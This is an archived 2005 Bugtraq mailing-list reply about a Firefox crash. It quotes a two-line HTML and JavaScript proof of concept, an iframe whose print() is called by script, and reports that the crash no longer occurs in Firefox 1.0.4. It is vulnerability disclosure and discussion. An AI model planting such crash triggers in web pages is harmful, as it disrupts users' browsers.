lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <42BB515D.4040803@gmail.com>
Date: Thu, 23 Jun 2005 19:18:37 -0500
From: Peter Bartosch <harrison.bergeron@...il.com>
To: orebla Orebla <info@...bla.it>
Cc: bugtraq@...urityfocus.com
Subject: Re: Firefox Crash??


I tested this on WinXP SP1 with version 1.0.4 and it didn't crash.  It 
has apparently been fixed.

orebla Orebla wrote:

>I have found this script in turn for the net and it sends to me in crash Firefox:
>
><!--PROOF OF CONCEPT
>The vulnerability can be exploited with the following 2 lines of code:
>
><iframe id="pocframe" name="pocframe" src="about:blank"></iframe>
>&lt;script type="text/javascript">window.frames.pocframe.print();&lt;/script&gt;
>-->
>
>I have WinXP SP2 e Firefox 1.0.3.
>
>Why firefox crash???
>
>PS: I do not have uncovered the vulnerability. Sorry for the English... 
>:-)
>
>  
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ